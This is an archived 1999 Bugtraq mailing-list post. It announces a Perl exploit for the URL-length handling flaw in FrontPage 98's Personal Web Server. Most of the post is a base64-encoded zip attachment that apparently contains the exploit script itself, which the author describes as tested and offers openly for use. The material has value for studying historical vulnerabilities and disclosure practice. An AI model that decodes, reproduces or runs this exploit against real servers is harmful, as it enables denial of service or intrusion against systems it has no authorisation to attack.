[11499] in bugtraq
FrontPage Personal Web Server
daemon@ATHENA.MIT.EDU (Kerb)
Tue Aug 24 17:56:07 1999
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BEED17.988F2020"
Message-Id: <01BEED17.987E5740.kerb@fnusa.com>
Date: Mon, 23 Aug 1999 03:28:39 -0500
Reply-To: Kerb <kerb@FNUSA.COM>
From: Kerb <kerb@FNUSA.COM>
X-To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM
------ =_NextPart_000_01BEED17.988F2020
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
I'm sorry if this exploit has already been released, but to the best of my
knowledge, it hasn't. This is a small exploit (written in perl) that takes
advantage of the poor URL length handling of FrontPage 98's personal web server
that is executed when you open/create a "web". This exploit will work on most
machines with a perl interpreter, I coded it (and tested it, of course) on my
Wind0ze 95 machine. If ya have any questions or comments about this script,
feel free to Email me.
-KerberosX : kerb [at] linuxfreak [dot] com
------ =_NextPart_000_01BEED17.988F2020
Content-Type: application/x-zip-compressed; name="fpfuck.zip"
Content-Transfer-Encoding: base64
UEsDBBQAAgAIALcaFyfPehux9AEAABAEAAAJAAAAZnBmdWNrLnBsrVNta9swEP6cQP7DUzfQBIzt
dutItgYWUqcd3ZqQhHWwDCPLaiLiSEZSugb64ye/5KVjsC/lvkh3z/Pc6U53euJvtPJjLvyMqbRR
b9QzxYXB1VUUhffX0WgY3Yb963DyKY/NT9/ack0MlRRmTBYMww1dfazValUA6EOvSZoirw6aKp4Z
JEzzhWAJjMQBmSiZHSm98wKve/EBv5ecLsH1AZgRZSAfj7DdDloVvu0dgAOZ2CRSgOCBi+4l1oQu
uWDYaC4WBxzB9WiKWLEc/YhxOPmKeIs7pmKmpP6xk3z73jXqf00pd+XWHA+jL/fhDD1c2Mk1p6PB
XTSdTcL+N+s6L4bZzKRtRA+doLoSY5gS1uNMITB4j+eOU4bMkuuIJImywYzQVWsHdneJ3MBF4BbW
Ljifnzg1fB3FW8O0peks5ablzz3fbfYnN99/Br9yYFMz9fQf6aJQ95VguypZSfsHelgwUxzjrSBr
1nIMzZwSoiVdMdPK3+9ir4jjhthbQW7j5aVRT7jlD4gQ0oAqRgxDqeFVinZXkp3evi9tvCKfGeSw
ikGlEIzui9i/+B8JS6Q3FxW1XMacCOfGjtN34MHpO3jGZRDkZ9zOZmP/3AvmwrKOSM4DS1MXqZQr
jZSvGLYE2dIumP2mZ2x9UsJpKjUrSssz/gFQSwMEFAACAAgAABsXJ2ZaKx/mAAAAQQEAAAoAAABm
cGZ1Y2sudHh0FY/BboQwDETvSPzD3Hqh+xFVWwn1stLuDwQyQNoQ09gs5e/rlXywrPGbmfuSFD7f
uxoCdA05Y2PN0LGmzRCpaS6MMEHbjDXogs8qxa5h5osipvJzIiezTBwcEANXKZe26XEExSjrlmnM
J/YSBhc5SB6sU5YDoURUHjUZ28YW4uN29cOc1FgvwE0wSUWRo0PvrKIpsiJ51rZ5l5tL+gmn7FjC
g447IY5xRfG/NViS0oG6cUze7GybMMhuWNzbc8y0J8s3/nHcjW4R2cETByWUHs+NVqp626fubZ/v
Nfx6vbZ5/WId/gFQSwECMgsUAAIACAC3Ghcnz3obsfQBAAAQBAAACQAAAAAAAAABACAAtoEAAAAA
ZnBmdWNrLnBsUEsBAjILFAACAAgAABsXJ2ZaKx/mAAAAQQEAAAoAAAAAAAAAAQAgALaBGwIAAGZw
ZnVjay50eHRQSwUGAAAAAAIAAgBvAAAAKQMAAAAA
------ =_NextPart_000_01BEED17.988F2020--
